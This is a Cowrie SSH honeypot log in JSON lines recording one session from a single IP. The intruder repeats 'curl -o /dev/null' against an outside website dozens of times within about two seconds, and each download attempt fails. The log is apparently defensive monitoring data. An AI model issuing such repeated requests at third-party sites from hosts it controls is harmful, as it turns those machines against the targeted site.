{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.409424Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.410120Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.446042Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.448908Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.449636Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.490752Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.491508Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.527361Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.531181Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.531772Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.569117Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.569985Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.606040Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.607836Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.608748Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.646346Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.647330Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.698139Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.699061Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.736411Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.737252Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.766743Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.777494Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.778354Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.824292Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.826424Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.827197Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.865011Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.866575Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.873755Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.914810Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.915863Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.953933Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.955026Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.983777Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:15.993262Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:15.994083Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.032637Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.033669Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.071189Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.072184Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.104550Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.123389Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.124349Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.165033Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.165950Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.204921Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.206063Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.243324Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.244241Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.280864Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.281858Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.318914Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.319800Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.357414Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.358430Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.396288Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.397173Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.437476Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.438806Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.475904Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.476824Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.524002Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.524915Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.563012Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.565002Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.603937Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.604863Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.642046Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.643168Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.682376Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.683608Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.720845Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.721824Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.758840Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.759746Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.798709Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.799909Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.837457Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.838415Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.876426Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.877767Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.925938Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.926905Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:16.964551Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:16.965506Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.002984Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.004076Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.041385Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.042345Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.082355Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.083324Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.120518Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.121512Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.158889Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.159817Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.203166Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.204159Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.240818Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.241681Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.282922Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.283821Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.330930Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.331968Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.368733Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.370004Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.406984Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.407900Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.445481Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.446336Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.483758Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.484912Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.521360Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.522249Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.559781Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.560667Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.597705Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.598630Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.635820Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.636806Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.674315Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.675286Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.722776Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.723691Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.763449Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.764367Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.803028Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.803916Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.840619Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
